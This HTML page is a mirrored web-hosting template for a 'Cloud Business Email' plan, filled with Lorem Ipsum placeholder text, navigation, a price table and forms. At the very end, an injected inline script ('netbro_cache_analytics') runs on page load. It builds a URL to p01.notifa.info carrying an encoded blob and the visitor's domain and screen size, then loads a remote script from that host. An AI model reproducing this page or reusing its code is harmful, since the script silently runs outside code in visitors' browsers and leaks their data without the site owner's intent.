<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from rctheme.com/demo-html/prohost/cloud-business-email.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Mobile Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<title>Cloud Business Email</title>

<!-- Favicon -->
<link rel="icon" href="images/favicon.png">

<!-- Bootstrap core CSS -->
<link href="css/bootstrap.css" rel="stylesheet" media="all" />

<!-- Font Awesome CSS -->
<link rel="stylesheet" href="css/font-awesome.css" media="all" />

<!-- Main Template CSS -->
<link rel="stylesheet" href="css/style.css" media="all" />

<!-- Animation CSS -->
<link rel="stylesheet" href="css/animate.min.css" media="all" />
</head>

<body>
<!-- ========= Header Section Start ========= -->

<header>
  <div class="top_header">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link">
            <ul>
              <li>24x7 Live support</li>
              <li>+ 91 123 4567 890</li>
            </ul>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link right">
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="login.html">Login</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="main_menu">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-12">
          <div class="logo"><a href="index-2.html"><img src="images/logo.png" alt="logo" title="logo" /></a></div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-12">
          <div class="navbar navbar-default" role="navigation">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sronly">Menu</span> <i class="fa fa-bars" aria-hidden="true"></i></button>
            </div>
            <nav class="navbar navbar-default">
              <div id="navbar-collapse-1" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                  <li><a href="index-2.html">Home</a></li>
                  <li><a href="register-domain.html">Domain</a></li>
                  <li><a href="#">Hosting <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="shared-hosting.html">Shared Hosting</a></li>
                      <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
                      <li><a href="dedicated-servers.html">Dedicated Servers</a></li>
                      <li><a href="vps.html">VPS Servers</a></li>
                      <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
                      <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
                    </ul>
                  </li>
                  <li class="active"><a href="#">Email <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="business-email.html">Business Email</a></li>
                      <li><a href="cloud-business-email.html">Cloud Business Email</a></li>
                      <li><a href="microsoft-office-365.html">Microsoft Office 365</a></li>
                      <li><a href="google-apps.html">Google Apps</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Security <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="ssl-security.html">SSL Security</a></li>
                      <li><a href="codeguard.html">Codeguard</a></li>
                    </ul>
                  </li>
                  <li><a href="bundled-offers.html">Bundle Offers</a></li>
                  <li><a href="support.html">Support</a></li>
                </ul>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </div>
</header>

<!-- ========= Header Section End ========= --> 

<!-- ========= Inner Page Banner Section Start ========= -->

<section class="inner_page_header">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <div class="inner_headin_s"><i class="fa fa-cloud" aria-hidden="true"></i>
          <h1>Cloud Business Email</h1>
          <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the ndustry's standard dummy text ever since the 1500s, when an unknown printer took. </p>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Inner Page Banner Section End ========= --> 

<!-- ========= Prices Table Section Start ========= -->

<section class="price_table text_center">
  <div class="tabbable-panel">
    <div class="tabbable-line">
      <div class="container">
        <div class="row">
          <div class="col-md-12 col-sm-12 col-xs-12">
            <div class="headings black_text">
              <h6>Plan and Price</h6>
              <h3>Cloud Email Hosting Plans</h3>
              <div class="sep black_bg"></div>
            </div>
          </div>
          <div class="hosting_price">
            <div class="col-sm-push-3 col-md-push-4 col-md-4 col-sm-6 col-xs-12 wow fadeInUp" data-wow-duration=".3" data-wow-delay=".2s">
              <div class="price_holder">
                <div class="price_img"><i class="fa fa-star"></i></div>
                <div class="clearfix"> </div>
                <h4>Starter</h4>
                <p>Dummy text of the printing and typesetting industry. </p>
                <div class="plan_value">
                  <div class="star_plan"> Starts from</div>
                  $1.02<span>/Month</span></div>
                <ul>
                  <li><strong>10 GB </strong> Email Space</li>
                </ul>
                <div class="order_now"> <a class="primary_button" href="#"> Order Now </a></div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Prices Table Section End ========= --> 

<!-- ========= What We Do Section Start ========= -->

<section class="what_we_do text_center white_text">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>Feature Rich</h6>
          <h3>Cloud Business Email</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".1s"><i class="fa fa-laptop what-icon" aria-hidden="true"></i>
        <h5 class="section_sub_heading">Responsive Design</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".2s"><i class="fa fa-shield what-icon" aria-hidden="true"></i>
        <h5 class="section_sub_heading">Virus Protection</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".3s"><i class="fa fa-calendar-o what-icon" aria-hidden="true"></i>
        <h5 class="section_sub_heading">Calendars, Contacts</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInUp" data-wow-duration=".3" data-wow-delay=".4s"><i class="fa fa-thumbs-up what-icon" aria-hidden="true"></i>
        <h5 class="section_sub_heading">100% Uptime</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
    </div>
  </div>
</section>

<!-- ========= What We Do Section End ========= --> 

<!-- ========= Call Back Form Section Start ========= -->

<section class="call_back_main text_center">
  <div class="container">
    <div class="col-md-6 col-sm-6 col-xs-12">
      <div class="headings black_text">
        <h6>Contact Us</h6>
        <h3>Get a Call Back</h3>
        <div class="sep black_bg"></div>
      </div>
      <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the ndustry's standard dummy text ever since the 1500s, when an unknown printer took. </p>
    </div>
    <div class="col-md-6 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
      <div class="form_outer">
        <form>
          <input type="text" name="name" class="name" placeholder="Name" required="">
          <input type="text" name="phone" class="name" placeholder="Contact Number" required="">
          <input type="email" name="email" class="name" placeholder="Email" required="">
          <input type="submit" name="submit" class="primary_button" value="Send Now">
        </form>
      </div>
    </div>
  </div>
</section>

<!-- ========= Call Back Form Section End ========= --> 

<!-- ========= Footer Section Start ========= -->

<footer class="footer">
  <div class="f_outr_section">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>About Us</h4>
            <div class="f_about">
              <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Quick Links</h4>
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="support.html">Support</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="bundled-offers.html">Bundle Offers</a></li>
              <li><a href="login.html">Login</a></li>
              <li><a href="404.html">404 Page</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Our Services</h4>
            <ul>
              <li><a href="shared-hosting.html">Shared Hosting</a></li>
              <li><a href="vps.html">Virtual Private Server</a></li>
              <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
              <li><a href="dedicated-servers.html">Dedicated Server</a></li>
              <li><a href="ssl-security.html">SSL Certificated</a></li>
              <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
              <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading ">
            <h4>Contact Us</h4>
            <div class="f_contact_s">
              <div class="f-con-head">Address:-
                <p>Lorem ipsum dolor<br>
                  amet dolor sit elit Suspendisse</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Contact:-
                <p>Ph: (+000) 1234 5678<br>
                  Fax: (+000) 1234 5678</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Email:-
                <p><a href="mailto:info@yourdomain.com">info@yourdomain.com</a><br>
                  <a href="mailto:sales@yourdomain.com">sales@yourdomain.com</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="news_letr">
            <form>
              <input type="text" placeholder="Enter your Email" class="nwesltr">
              <input type="submit" class="secondry_button join_now" value="Join Now">
            </form>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="social">
            <ul>
              <li><a href="#"><i class="fa fa-facebook"></i></a></li>
              <li><a href="#"><i class="fa fa-google"></i></a></li>
              <li><a href="#"><i class="fa fa-twitter"></i></a></li>
              <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="copy-right">
    <div class="container">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">Copyright © 2015 - 2017 prohost. All Rights Reserved.</div>
      </div>
    </div>
  </div>
</footer>

<!-- ========= Footer Section End ========= --> 

<!-- Bootstrap core JavaScript --> 
<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/bootstrap.min.js"></script> 

<!-- Animation JavaScript --> 
<script type="text/javascript" src="js/jquery.wow.min.js" ></script> 
<script type="text/javascript" src="js/wow.min.js" ></script> 

<!-- Custom Template JavaScript --> 
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m834VngSV4X76cPRTbs58TAY2g7fc42xVwjCYPgQLrc8DtZGTDuu6NS%2bwpp1%2bqlcwnRTcO8xYrjJdqXOHu2tDmAf44Ce64OUv7zoOpcSJ3LuV2weP0M%2fnLXRjncroG4jpgeJXlt2vfPTajMcwSd8sVAd9cxd9UIltdehnBWwC6Hmo0K1gkdF%2b1m4zLYdmV8X3l%2bxlLjeOoiFDfQW51V%2bSOmbQxnVUd%2bYehKmJM9oli%2bSIqgnfeAZMaknRYxpdENGOsSpW93yF0q%2b4GrN4AFc%2bVm2G0Qw8JztcVm2RoN5SpM58M1yAj6Kay%2fqiGJ8F%2flBVQU2tIOretNbsMDRy%2byyNe%2bUK3cgDmrFAHY7AIXuqiZEX4bmvKHmbtM0u0eZ39rISWvLbtB305GO2affzhW8NOPJz7VDKMlZtFnEeUa%2bO7yE0CmMbubEGXmQ5GthrUzgkzwhlQ9dfEI9lRRWEAjwiVvV6pGZ93MqbuMz%2fNhB8iK9hQRnntL%2be6gcuoCTn3UBq + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from rctheme.com/demo-html/prohost/cloud-business-email.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
</html>